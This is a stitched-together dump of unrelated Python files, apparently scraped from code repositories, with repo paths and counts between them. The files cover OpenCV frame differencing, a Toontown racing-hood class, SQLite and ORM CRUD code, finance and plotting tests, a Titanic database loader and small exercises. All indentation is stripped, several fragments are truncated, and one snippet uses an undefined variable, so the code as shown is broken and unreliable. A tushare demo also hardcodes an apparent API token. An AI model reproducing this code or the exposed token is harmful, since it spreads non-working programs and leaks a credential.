frame_ids = captured_video.get(cv2.CAP_PROP_FRAME_COUNT) * np.random.uniform(size=20)
# Store the frames in an empty array(list)
temp_frames = []
# Loop through to get each frame with its corresponding id
for frame_id in frame_ids:
# mark each frame on videocapture object
captured_video.set(cv2.CAP_PROP_POS_FRAMES, frame_id)
# get each frame
ret_val, individual_frame = captured_video.read()
# append into temporary list
temp_frames.append(individual_frame)
# print(ret_val)
# Now we calculate the median along the time axis
median_frame = np.median(temp_frames, axis=0).astype(dtype=np.uint8)
# Display the median frame thus calculated
cv2.imshow('Median Frame', median_frame)
cv2.waitKey(0)
# cv2.imwrite('median_frame.jpg',median_frame)
# Now we create a mask for every frame
# Reset previously set frame number to 0
captured_video.set(cv2.CAP_PROP_POS_FRAMES, 0)
# Now convert median frame to grayscale
gray_median_frame = cv2.cvtColor(median_frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('Gray Scale Image', gray_median_frame)
cv2.waitKey(0)
while(ret_val):
# Read the current frame
ret_val, frame = captured_video.read()  # update the loop condition so the loop ends when the video does
if frame is not None:
# Convert the current frame to grayscale
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Calculate absolute difference of current frame and the median frame
diff_frame = cv2.absdiff(frame, gray_median_frame)
# Threshold to binarize
th, diff_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)
# Display the final image
# cv2.imshow('Temp Frames',frame)
cv2.imshow('Difference Frames', diff_frame)
cv2.waitKey(20)
cv2.waitKey(0)
# Release VideoCapture object
captured_video.release()
# Close all Windows
cv2.destroyAllWindows()
2,503
scripts/create_test_data_file_from_bt.py
roger-/pyzephyr
1
2022800
import serial
import time
import platform
import csv
import zephyr.protocol
def main():
serial_port_dict = {"Darwin": "/dev/cu.BHBHT001931-iSerialPort1",
"Windows": 23}
serial_port = serial_port_dict[platform.system()]
ser = serial.Serial(serial_port)
callback = lambda x: None
protocol = zephyr.protocol.BioHarnessProtocol(ser, callback, "../test_data/120-second-bt-stream")
protocol.enable_periodic_packets()
start_time = time.time()
while time.time() < start_time + 120:
protocol.read_and_handle_bytes(1)
if __name__ == "__main__":
main()
630
toontown/hood/GSHoodAI.py
journeyfan/toontown-journey
1
2024433
from toontown.classicchars import DistributedGoofySpeedwayAI
from libpandadna import DNAGroup, DNAVisGroup
from toontown.hood import HoodAI
from toontown.hood import ZoneUtil
from toontown.racing import RaceGlobals
from toontown.racing.DistributedRacePadAI import DistributedRacePadAI
from toontown.racing.DistributedStartingBlockAI import DistributedStartingBlockAI
from toontown.racing.DistributedViewPadAI import DistributedViewPadAI
from toontown.racing.DistributedStartingBlockAI import DistributedViewingBlockAI
from toontown.toonbase import ToontownGlobals
class GSHoodAI(HoodAI.HoodAI):
def __init__(self, air):
HoodAI.HoodAI.__init__(self, air,
ToontownGlobals.GoofySpeedway,
ToontownGlobals.GoofySpeedway)
self.racingPads = []
self.viewingPads = []
self.viewingBlocks = []
self.startingBlocks = []
self.leaderBoards = []
self.classicChar = None
self.startup()
def startup(self):
HoodAI.HoodAI.startup(self)
self.createStartingBlocks()
self.createLeaderBoards()
self.cycleLeaderBoards()
if simbase.config.GetBool('want-goofy', True):
self.createClassicChar()
def shutdown(self):
HoodAI.HoodAI.shutdown(self)
taskMgr.removeTasksMatching('leaderBoardSwitch')
for board in self.leaderBoards:
board.delete()
del self.leaderBoards
def findRacingPads(self, dnaGroup, zoneId, area, padType='racing_pad'):
racingPads = []
racingPadGroups = []
if isinstance(dnaGroup, DNAGroup) and (padType in dnaGroup.getName()):
racingPadGroups.append(dnaGroup)
if padType == 'racing_pad':
nameInfo = dnaGroup.getName().split('_')
racingPad = DistributedRacePadAI(simbase.air)
racingPad.setArea(zoneId)
racingPad.nameType = nameInfo[3]
racingPad.index = int(nameInfo[2])
nextRaceInfo = RaceGlobals.getNextRaceInfo(-1, racingPad.nameType, racingPad.index)
racingPad.setTrackInfo([nextRaceInfo[0], nextRaceInfo[1]])
racingPad.generateWithRequired(zoneId)
elif padType == 'viewing_pad':
racingPad = DistributedViewPadAI(simbase.air)
racingPad.setArea(zoneId)
racingPad.generateWithRequired(zoneId)
else:
self.notify.error('Invalid racing pad type: ' + padType)
racingPads.append(racingPad)
elif isinstance(dnaGroup, DNAVisGroup):
zoneId = ZoneUtil.getTrueZoneId(int(dnaGroup.getName().split(':')[0]), zoneId)
for i in range(dnaGroup.getNumChildren()):
(foundRacingPads, foundRacingPadGroups) = self.findRacingPads(dnaGroup.at(i), zoneId, area, padType=padType)
racingPads.extend(foundRacingPads)
racingPadGroups.extend(foundRacingPadGroups)
return (racingPads, racingPadGroups)
def findStartingBlocks(self, dnaGroup, racePad):
startingBlocks = []
if isinstance(dnaGroup, DNAGroup) and ('starting_block' in dnaGroup.getName()):
x, y, z = dnaGroup.getPos()
h, p, r = dnaGroup.getHpr()
if isinstance(racePad, DistributedRacePadAI):
startingBlock = DistributedStartingBlockAI(simbase.air)
elif isinstance(racePad, DistributedViewPadAI):
startingBlock = DistributedViewingBlockAI(simbase.air)
else:
self.notify.error('Unknown starting block type.')
startingBlock.setPosHpr(x, y, z, h, p, r)
startingBlock.setPadDoId(racePad.doId)
startingBlock.setPadLocationId(getattr(racePad, 'index', 0))
startingBlock.generateWithRequired(racePad.zoneId)
startingBlocks.append(startingBlock)
for i in range(dnaGroup.getNumChildren()):
foundStartingBlocks = self.findStartingBlocks(dnaGroup.at(i), racePad)
startingBlocks.extend(foundStartingBlocks)
return startingBlocks
def createStartingBlocks(self):
self.racingPads = []
self.viewingPads = []
racingPadGroups = []
viewingPadGroups = []
for zoneId in self.getZoneTable():
dnaData = self.air.dnaDataMap.get(zoneId, None)
zoneId = ZoneUtil.getTrueZoneId(zoneId, self.zoneId)
if dnaData.getName() == 'root':
area = ZoneUtil.getCanonicalZoneId(zoneId)
(foundRacingPads, foundRacingPadGroups) = self.findRacingPads(dnaData, zoneId, area, padType='racing_pad')
(foundViewingPads, foundViewingPadGroups) = self.findRacingPads(dnaData, zoneId, area, padType='viewing_pad')
self.racingPads.extend(foundRacingPads)
racingPadGroups.extend(foundRacingPadGroups)
self.viewingPads.extend(foundViewingPads)
viewingPadGroups.extend(foundViewingPadGroups)
self.startingBlocks = []
for (dnaGroup, racePad) in zip(racingPadGroups, self.racingPads):
foundStartingBlocks = self.findStartingBlocks(dnaGroup, racePad)
self.startingBlocks.extend(foundStartingBlocks)
for startingBlock in foundStartingBlocks:
racePad.addStartingBlock(startingBlock)
self.viewingBlocks = []
for (dnaGroup, viewPad) in zip(viewingPadGroups, self.viewingPads):
foundViewingBlocks = self.findStartingBlocks(dnaGroup, viewPad)
self.viewingBlocks.extend(foundViewingBlocks)
for viewingBlock in foundViewingBlocks:
viewPad.addStartingBlock(viewingBlock)
def findLeaderBoards(self, dnaData, zoneId):
return [] # TODO
def createLeaderBoards(self):
self.leaderBoards = []
dnaData = self.air.dnaDataMap[self.zoneId]
if dnaData.getName() == 'root':
self.leaderBoards = self.findLeaderBoards(dnaData, self.zoneId)
for leaderBoard in self.leaderBoards:
if not leaderBoard:
continue
if 'city' in leaderBoard.getName():
leaderBoardType = 'city'
elif 'stadium' in leaderBoard.getName():
leaderBoardType = 'stadium'
elif 'country' in leaderBoard.getName():
leaderBoardType = 'country'
for subscription in RaceGlobals.LBSubscription[leaderBoardType]:
leaderBoard.subscribeTo(subscription)
def cycleLeaderBoards(self, task=None):
messenger.send('leaderBoardSwap-' + str(self.zoneId))
taskMgr.doMethodLater(10, self.cycleLeaderBoards, 'leaderBoardSwitch')
def createClassicChar(self):
self.classicChar = DistributedGoofySpeedwayAI.DistributedGoofySpeedwayAI(self.air)
self.classicChar.generateWithRequired(self.zoneId)
self.classicChar.start()
import sqlite3
def connect():
'''it is used to connect to the database books'''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS book(id integer PRIMARY KEY,title text,author text,year text,isbn integer)")
conn.commit()
conn.close()
def insert(title,author,year,isbn):
''' it is used to insert into the database '''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("INSERT INTO book values (Null,?,?,?,?)",(title,author,year,isbn))
conn.commit()
conn.close()
def view():
''' it is used to view all the entries in the book table of the books database '''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("SELECT * FROM book")
rows=cur.fetchall()
conn.close()
return rows
def search(title="",author="",year="",isbn=""):
''' it is used to search the entries;
empty strings are passed as defaults so that the user can search by any one of the fields '''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("SELECT * FROM book where title=? or author=? or year=? or isbn=?",(title,author,year,isbn))
conn.commit()
rows=cur.fetchall()
conn.close()
return rows
def update(id,title,author,year,isbn):
''' it updates the values according to the id selected in the user interface '''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("UPDATE book SET title=?,author=?,year=?,isbn=? where id=?",(title,author,year,isbn,id))
conn.commit()
conn.close()
def delete(id):
''' deletes according to the id selected'''
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("DELETE FROM book WHERE id=?",(id,)) # the trailing comma in (id,) makes it a single-element tuple
conn.commit()
conn.close()
def delete_all():
conn=sqlite3.connect("books.db")
cur=conn.cursor()
cur.execute("DELETE FROM book")
conn.commit()
conn.close()
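# --- Illustrative sketch (added; the sample record is made up) ---
# Typical usage of this CRUD module: create the table once, insert a record,
# then read it back either in full or filtered by a single field.
if __name__ == "__main__":
    connect()
    insert("Example Book", "Jane Doe", "1999", 1234567890)
    print(view())                      # all rows
    print(search(author="Jane Doe"))   # rows matching one field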
1,847
gpvdm_gui/gui/lasers.py
roderickmackenzie/gpvdm
12
2022876
#
# General-purpose Photovoltaic Device Model - a drift diffusion base/Shockley-Read-Hall
# model for 1st, 2nd and 3rd generation solar cells.
# Copyright (C) 2008-2022 <NAME> r.<EMAIL>.<EMAIL> at googlemail.com
#
# https://www.gpvdm.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2.0, as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## @package lasers
# Main laser editor window.
#
import os
import webbrowser
from tab import tab_class
from icon_lib import icon_get
import i18n
_ = i18n.language.gettext
#qt
from PyQt5.QtWidgets import QMainWindow, QTextEdit, QAction, QApplication
from PyQt5.QtGui import QIcon, QPainter, QFont, QColor
from PyQt5.QtCore import QSize, Qt
from PyQt5.QtWidgets import QWidget,QSizePolicy,QVBoxLayout,QPushButton,QDialog,QFileDialog,QToolBar,QLabel,QComboBox, QTabWidget,QStatusBar,QMenuBar, QTabBar, QStylePainter, QStyleOptionTab,QStyle
#window
from gui_util import yes_no_dlg
from gui_util import dlg_get_text
from util import wrap_text
from QWidgetSavePos import QWidgetSavePos
from cal_path import get_sim_path
from css import css_apply
from experiment import experiment
class lasers(experiment):
def __init__(self,data=None):
experiment.__init__(self,window_save_name="laser_editor", window_title=_("Laser editor"),name_of_tab_class="jvexperiment_tab",json_search_path="gpvdm_data().lasers")
self.notebook.currentChanged.connect(self.switch_page)
#self.ribbon.tb_save.setVisible(False)
self.switch_page()
def switch_page(self):
tab = self.notebook.currentWidget()
#self.tb_lasers.update(tab.data)
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import pandas as pd
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.tickers.tickers import CcyTicker
from qf_lib.common.utils.dateutils.string_to_date import str_to_date
from qf_lib.containers.dataframe.prices_dataframe import PricesDataFrame
from qf_lib.containers.dataframe.qf_dataframe import QFDataFrame
from qf_lib.containers.qf_data_array import QFDataArray
from qf_lib.containers.series.prices_series import PricesSeries
from qf_lib.containers.series.qf_series import QFSeries
from qf_lib.data_providers.cryptocurrency.cryptocurrency_data_provider import CryptoCurrencyDataProvider
@unittest.skip("CryptoCurrencyDataProvider needs update")
class TestCryptoCurrency(unittest.TestCase):
START_DATE = str_to_date('2016-01-01')
END_DATE = str_to_date('2017-02-02')
SINGLE_FIELD = 'Close'
MANY_FIELDS = ['Open', 'Volume', 'Close']
SINGLE_TICKER = CcyTicker('Bitcoin')
MANY_TICKERS = [CcyTicker('Bitcoin'), CcyTicker('Ethereum'), CcyTicker('Ripple')]
NUM_OF_DATES = 399
SINGLE_PRICE_FIELD = PriceField.Close
MANY_PRICE_FIELDS = [PriceField.Close, PriceField.Open, PriceField.High]
def setUp(self):
self.cryptocurrency_provider = CryptoCurrencyDataProvider()
# =========================== Test get_price method ==========================================================
def test_price_single_ticker_single_field(self):
# single ticker, single field; end_date by default now, frequency by default DAILY, currency by default None
data = self.cryptocurrency_provider.get_price(tickers=self.SINGLE_TICKER, fields=self.SINGLE_PRICE_FIELD,
start_date=self.START_DATE, end_date=self.END_DATE,
frequency=Frequency.DAILY)
self.assertIsInstance(data, PricesSeries)
self.assertEqual(len(data), self.NUM_OF_DATES)
self.assertEqual(data.name, self.SINGLE_TICKER.as_string())
def test_price_single_ticker_multiple_fields(self):
# single ticker, many fields; can be the same as for single field???
data = self.cryptocurrency_provider.get_price(tickers=self.SINGLE_TICKER, fields=self.MANY_PRICE_FIELDS,
start_date=self.START_DATE, end_date=self.END_DATE,
frequency=Frequency.DAILY)
self.assertEqual(type(data), PricesDataFrame)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_PRICE_FIELDS)))
self.assertEqual(list(data.columns), self.MANY_PRICE_FIELDS)
def test_price_multiple_tickers_single_field(self):
data = self.cryptocurrency_provider.get_price(tickers=self.MANY_TICKERS, fields=self.SINGLE_PRICE_FIELD,
start_date=self.START_DATE, end_date=self.END_DATE,
frequency=Frequency.DAILY)
self.assertEqual(type(data), PricesDataFrame)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS)))
self.assertEqual(list(data.columns), self.MANY_TICKERS)
def test_price_multiple_tickers_multiple_fields(self):
# testing for single date (start_date and end_date are the same)
data = self.cryptocurrency_provider.get_price(tickers=self.MANY_TICKERS, fields=self.MANY_PRICE_FIELDS,
start_date=self.START_DATE, end_date=self.END_DATE,
frequency=Frequency.DAILY)
self.assertEqual(type(data), QFDataArray)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS), len(self.MANY_PRICE_FIELDS)))
self.assertIsInstance(data.dates.to_index(), pd.DatetimeIndex)
self.assertEqual(list(data.tickers), self.MANY_TICKERS)
self.assertEqual(list(data.fields), self.MANY_PRICE_FIELDS)
# =========================== Test get_history method ==========================================================
def test_historical_single_ticker_single_field(self):
# single ticker, single field; end_date by default now, frequency by default DAILY, currency by default None
data = self.cryptocurrency_provider.get_history(tickers=self.SINGLE_TICKER, fields=self.SINGLE_FIELD,
start_date=self.START_DATE, end_date=self.END_DATE)
self.assertIsInstance(data, QFSeries)
self.assertEqual(len(data), self.NUM_OF_DATES)
self.assertEqual(data.name, self.SINGLE_TICKER.as_string())
def test_historical_single_ticker_multiple_fields(self):
# single ticker, many fields; can be the same as for single field???
data = self.cryptocurrency_provider.get_history(tickers=self.SINGLE_TICKER, fields=self.MANY_FIELDS,
start_date=self.START_DATE, end_date=self.END_DATE)
self.assertEqual(type(data), QFDataFrame)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_FIELDS)))
self.assertEqual(list(data.columns), self.MANY_FIELDS)
def test_historical_multiple_tickers_single_field(self):
data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.SINGLE_FIELD,
start_date=self.START_DATE, end_date=self.END_DATE)
self.assertEqual(type(data), QFDataFrame)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS)))
self.assertEqual(list(data.columns), self.MANY_TICKERS)
def test_historical_multiple_tickers_multiple_fields_one_date(self):
# testing for single date (start_date and end_date are the same)
data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.MANY_FIELDS,
start_date=self.END_DATE, end_date=self.END_DATE)
self.assertEqual(type(data), QFDataFrame)
self.assertEqual(data.shape, (len(self.MANY_TICKERS), len(self.MANY_FIELDS)))
self.assertEqual(list(data.index), self.MANY_TICKERS)
self.assertEqual(list(data.columns), self.MANY_FIELDS)
def test_historical_multiple_tickers_multiple_fields_many_dates(self):
# testing for single date (start_date and end_date are the same)
data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.MANY_FIELDS,
start_date=self.START_DATE, end_date=self.END_DATE)
self.assertEqual(type(data), QFDataArray)
self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS), len(self.MANY_FIELDS)))
self.assertIsInstance(data.dates.to_index(), pd.DatetimeIndex)
self.assertEqual(list(data.tickers), self.MANY_TICKERS)
self.assertEqual(list(data.fields), self.MANY_FIELDS)
if __name__ == '__main__':
unittest.main()
7,828
python-package/test/plot/test_aes.py
OLarionova-HORIS/lets-plot
0
2023098
#
# Copyright (c) 2019. JetBrains s.r.o.
# Use of this source code is governed by the MIT license that can be found in the LICENSE file.
#
import pytest
import lets_plot as gg
class TestWithListArgs:
result_empty = {'x': None, 'y': None}
result_xy = {'x': 'xVar', 'y': 'yVar'}
@pytest.mark.parametrize('args,expected', [
([], result_empty),
(['xVar', 'yVar'], result_xy),
])
def test_aes(self, args, expected):
spec = gg.aes(*args)
assert spec.as_dict() == expected
class TestWithDictArgs:
result_kwargs = {'x': 'xVar', 'y': 'yVar', 'size': 'sizeVar'}
@pytest.mark.parametrize('args,expected', [
(result_kwargs, result_kwargs),
])
def test_aes(self, args, expected):
spec = gg.aes(**args)
assert spec.as_dict() == expected
822
pytest_django_test/settings_sqlite_file.py
lendingloop/pytest-django
5,079
2022852
import tempfile
from .settings_base import * # noqa: F401 F403
# This is a SQLite configuration, which uses a file based database for
# tests (via setting TEST_NAME / TEST['NAME']).
# The name as expected / used by Django/pytest_django (tests/db_helpers.py).
_fd, _filename = tempfile.mkstemp(prefix="test_")
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "/pytest_django_should_never_get_accessed",
"TEST": {"NAME": _filename},
}
}
498
automated_correction_module/word_seg_try.py
anaghrao-99/Digital-Portal-for-Schools
0
2024096
#grayscale
import numpy as np
import cv2
import imutils
from imutils import contours
import sys
import subprocess
import os
from pathlib import Path
filename_input = sys.argv[1]
def erode_image(filename):
img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)
# increase contrast
pxmin = np.min(img)
pxmax = np.max(img)
imgContrast = (img - pxmin) / (pxmax - pxmin) * 255
# increase line width
kernel = np.ones((4, 4), np.uint8)
imgMorph = cv2.erode(imgContrast, kernel, iterations = 2)
# write
cv2.imwrite(filename, imgMorph)
def get_contour_precedence(contour, cols):
origin = cv2.boundingRect(contour)
return origin[1] * cols + origin[0]
image = cv2.imread(filename_input)
# image = cv2.imread(filename)
gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
# cv2.imshow('gray',gray)
# cv2.waitKey(0)
#binary
ret,thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY_INV)
#dilation
kernel = np.ones((5, 100), np.uint8)
img_dilation = cv2.dilate(thresh, kernel, iterations=5)
#find contours im2
ctrs, hier = cv2.findContours(img_dilation.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
#sort contours
# sorted_ctrs = sorted(ctrs, key=lambda ctr:get_contour_precedence(ctr, img_dilation.shape[1]))
for ctr in ctrs :
x, y, w, h = cv2.boundingRect(ctr)
sorted_ctrs = sorted(ctrs, key=lambda ctr: get_contour_precedence(ctr, img_dilation.shape[1]))
# sorted_ctrs = sorted(ctrs, key=lambda ctr: cv2.boundingRect(ctr)[0] + cv2.boundingRect(ctr)[1] * image.shape[1] )
path = os.path.abspath(os.getcwd()) + '/out_test/'
if(os.path.exists(path)):
for f in Path(path).glob('*.png'):
f.unlink()
for i, ctr in enumerate(sorted_ctrs):
# Get bounding box
x, y, w, h = cv2.boundingRect(ctr)
# Getting ROI
roi = image[y:y+h, x:x+w]
# show ROI
#print('segment no:' + str(i))
# cv2.imshow('segment no:'+str(i),roi)
string = 'out_test/'
string+= str(i)
string += '.png'
# initial_directory = os.path.abspath(os.getcwd())
cv2.imwrite(string, roi)
# erode_image(string)
# cv2.imshow(roi)
cv2.rectangle( image,(x,y),( x + w, y + h ),(90,0,255),2)
# cv2.waitKey(0)
# pipe = subprocess.check_call(["python", filename])
print("Splitting into lines is over")
2,296
src/providers/api/modules/etlMods.py
9LKQ7ZLC82/cccatalog
1
2024500
import logging
import os
import re
import requests
import time
import json
import argparse
import random
from datetime import datetime, timedelta
PATH = os.environ['OUTPUT_DIR']
def writeToFile(_data, _name):
outputFile = '{}{}'.format(PATH, _name)
if len(_data) < 1:
return None
logging.info('Writing to file => {}'.format(outputFile))
with open(outputFile, 'a') as fh:
for line in _data:
if line:
fh.write('\t'.join(line) + '\n')
def sanitizeString(_data):
if _data is None:
return ''
_data = _data.strip()
_data = _data.replace('"', "'")
_data = re.sub(r'\n|\r', ' ', _data)
return re.sub(r'\s+', ' ', _data)
def delayProcessing(_startTime, _maxDelay):
minDelay = 1.0
#subtract time elapsed from the requested delay
elapsed = float(time.time()) - float(_startTime)
delayInterval = round(_maxDelay - elapsed, 3)
waitTime = max(minDelay, delayInterval) #time delay between requests.
logging.info('Time delay: {} second(s)'.format(waitTime))
time.sleep(waitTime)
def requestContent(_url):
logging.info('Processing request: {}'.format(_url))
try:
response = requests.get(_url)
if response.status_code == requests.codes.ok:
return response.json()
else:
logging.warning('Unable to request URL: {}. Status code: {}'.format(_url, response.status_code))
return None
except Exception as e:
logging.error('There was an error with the request.')
logging.info('{}: {}'.format(type(e).__name__, e))
return None
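# --- Illustrative sketch (added; the URL and delay below are hypothetical) ---
# delayProcessing() enforces a minimum spacing between requests: it subtracts the
# time already spent on the current request from the requested delay and sleeps
# for the remainder (never less than one second). A polite crawl loop could be:
#
#   for page in range(1, 4):
#       startTime = time.time()
#       result = requestContent('https://example.org/api?page={}'.format(page))
#       delayProcessing(startTime, 5.0)  # aim for at most one request every ~5 seconds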
1,643
backend/api/serializers/model_year_report_make.py
kuanfandevops/zeva
0
2023115
from rest_framework.serializers import ModelSerializer
from api.models.model_year_report_make import ModelYearReportMake
class ModelYearReportMakeSerializer(ModelSerializer):
class Meta:
model = ModelYearReportMake
fields = (
'make',
)
279
AutomateTheBoringStuff/sameName.py
pythoncoder999/Python
1
2024508
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 26 23:49:56 2019
@author: <NAME>
"""
def spam():
eggs = "spam local"
print(eggs) # prints "spam local"
def bacon():
eggs = "bacon local"
print(eggs) # prints "bacon local"
spam()
print(eggs) #prints "bacon local"
eggs = "global"
bacon()
print(eggs) #prints "global"
# imports
import psycopg2
import pandas as pd
from psycopg2.extras import execute_values
# reading in titanic Data
df = pd.read_csv('titanic.csv')
# renaming columns in order to have them read into elephant
df = df.rename(columns={'Siblings/Spouses Aboard': 'siblingsspouse', 'Parents/Children Aboard': 'parentschildren'})  # assign back so the rename actually takes effect
# getting rid of unnecessary apostrophes
df['Name'] = df['Name'].str.replace("'", "")
# creds for cloud DB, password is <PASSWORD>
dbname = 'cwsewxgg'
user = 'cwsewxgg' # ElephantSQL happens to use same name for db and user
password = ' ' # Sensitive! Don't share/commit
host = 'drona.db.elephantsql.com'
# connection to cloud
pg_conn = psycopg2.connect(dbname=dbname, user=user, password=password, host=host)
pg_curs = pg_conn.cursor()
# creating Titanic Table
create_titanic_table = """
DROP TABLE IF EXISTS Titanic;
CREATE TABLE Titanic (
index INT,
Survived INT,
Pclass INT,
Name TEXT,
Sex TEXT,
Age REAL,
siblingsspouse INT,
parentschildren INT,
Fare REAL
);
"""
# running table and committing table
pg_curs.execute(create_titanic_table)
pg_conn.commit()
# using the execute_values function to bulk-insert every dataframe row in a single statement
execute_values(pg_curs, """
INSERT INTO Titanic
(Survived, Pclass, Name, Sex, Age, siblingsspouse, parentschildren, Fare)
VALUES %s;
""", [tuple(row) for row in df.values])
# commit
pg_conn.commit()
pg_curs.execute("""
SELECT *
FROM Titanic
LIMIT 1;
""")
# printing to validate
print(pg_curs.fetchall())
1,554
demo/tushare_native/broad_market_demo.py
WZYStudio/QuantJob
0
2024099
import tushare as ts
# This data includes vol, ma5, ma10 and so on, which is quite handy
if __name__ == '__main__':
ts.set_token('c88ef7fb2542e2f89e9c79c2d22ce2421511da6af7f905f60c7a29b4')
days_deal = ts.get_hist_data('600584', start='2020-05-18', end='2020-05-21')
print(days_deal)
261
orm/manager.py
draihal/simple_orm_sqlite
0
2023771
from .db_helpers import attrs, copy_attrs, render_create_table_stmt
class Manager:
def __init__(self, db, model, type_check=True):
self.db = db
self.model = model
self.table_name = model.__name__
self.type_check = type_check
if not self._hastable():
self.db.executescript(render_create_table_stmt(self.model))
def all(self):
result = self.db.execute(f'SELECT * FROM {self.table_name}')
return (self.create(**row) for row in result.fetchall())
def create(self, **kwargs):
obj = object.__new__(self.model)
obj.__dict__ = kwargs
return obj
def delete(self, obj):
sql = 'DELETE from %s WHERE id = ?'
self.db.execute(sql % self.table_name, obj.id)
def get(self, id):
sql = f'SELECT * FROM {self.table_name} WHERE id = ?'
result = self.db.execute(sql, id)
row = result.fetchone()
if not row:
msg = 'Object %s with id %s does not exist' % (self.model, id)
raise ValueError(msg)
return self.create(**row)
def has(self, id):
sql = f'SELECT id FROM {self.table_name} WHERE id = ?'
result = self.db.execute(sql, id)
return True if result.fetchall() else False
def save(self, obj):
if 'id' in obj.__dict__ and self.has(obj.id):
msg = 'Object %s id already registered: %s' % (self.model, obj.id)
raise ValueError(msg)
clone = copy_attrs(obj, remove=['id'])
self.type_check and self._isvalid(clone)
column_names = '%s' % ', '.join(clone.keys())
column_references = '%s' % ', '.join('?' for i in range(len(clone)))
sql = 'INSERT INTO %s (%s) VALUES (%s)'
sql = sql % (self.table_name, column_names, column_references)
result = self.db.execute(sql, *clone.values())
obj.id = result.lastrowid
return obj
def update(self, obj):
clone = copy_attrs(obj, remove=['id'])
self.type_check and self._isvalid(clone)
where_expressions = '= ?, '.join(clone.keys()) + '= ?'
sql = 'UPDATE %s SET %s WHERE id = ?' % (self.table_name, where_expressions)
self.db.execute(sql, *(list(clone.values()) + [obj.id]))
def _hastable(self):
sql = 'SELECT name len FROM sqlite_master WHERE type = ? AND name = ?'
result = self.db.execute(sql, 'table', self.table_name)
return True if result.fetchall() else False
def _isvalid(self, attr_values):
attr_types = attrs(self.model)
value_types = {a: v.__class__ for a, v in attr_values.items()}
for attr, value_type in value_types.items():
if value_type is not attr_types[attr]:
msg = "%s value should be type %s not %s"
raise TypeError(msg % (attr, attr_types[attr], value_type))
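# --- Illustrative sketch (added; Note and db are hypothetical placeholders) ---
# A Manager couples a database wrapper with a model class and creates the table
# on first use; rough intended usage looks like:
#
#   manager = Manager(db, Note)        # db must expose execute()/executescript()
#   note = manager.create(text='hello')
#   note = manager.save(note)          # INSERTs the row and assigns note.id
#   same = manager.get(note.id)        # SELECT ... WHERE id = ?
#   manager.delete(same)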
month = input()
days_sleeping = int(input())
price_studio = 0
price_apartment = 0
if month == "May" or month == "October":
price_studio = days_sleeping * 50
price_apartment = days_sleeping * 65
if days_sleeping > 14:
price_studio *= 0.70
elif days_sleeping > 7:
price_studio *= 0.95
if month == "June" or month == "September":
price_studio = days_sleeping * 75.20
price_apartment = days_sleeping * 68.70
if days_sleeping > 14:
price_studio *= 0.80
if month == "July" or month == "August":
price_studio = days_sleeping * 76
price_apartment = days_sleeping * 77
if days_sleeping > 14:
price_apartment *= 0.90
print(f"Apartment: {price_apartment:.2f} lv.")
print(f"Studio: {price_studio:.2f} lv.")
if diff < 59:
print("Early")
print(f"{diff} before the start")
elif diff > 59:
hours = diff // 60
minutes = diff % 60
print("Early")
print(f"{hours}:{minutes:02d} hours before the start")
978
migrations/versions/0d2523c0cb8a_.py
monstersun/blog
0
2023130
"""empty message
Revision ID: 0d2523c0cb8a
Revises: <PASSWORD>
Create Date: 2017-12-13 19:29:39.010490
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('Post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.TEXT(), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('auther_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['auther_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_Post_timestamp'), 'Post', ['timestamp'], unique=False)
op.add_column('users', sa.Column('avatar_hash', sa.String(length=64), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'avatar_hash')
op.drop_index(op.f('ix_Post_timestamp'), table_name='Post')
op.drop_table('Post')
# ### end Alembic commands ###
1,174
mkrandomkeys.py
jadeblaquiere/keymaster
0
2024286
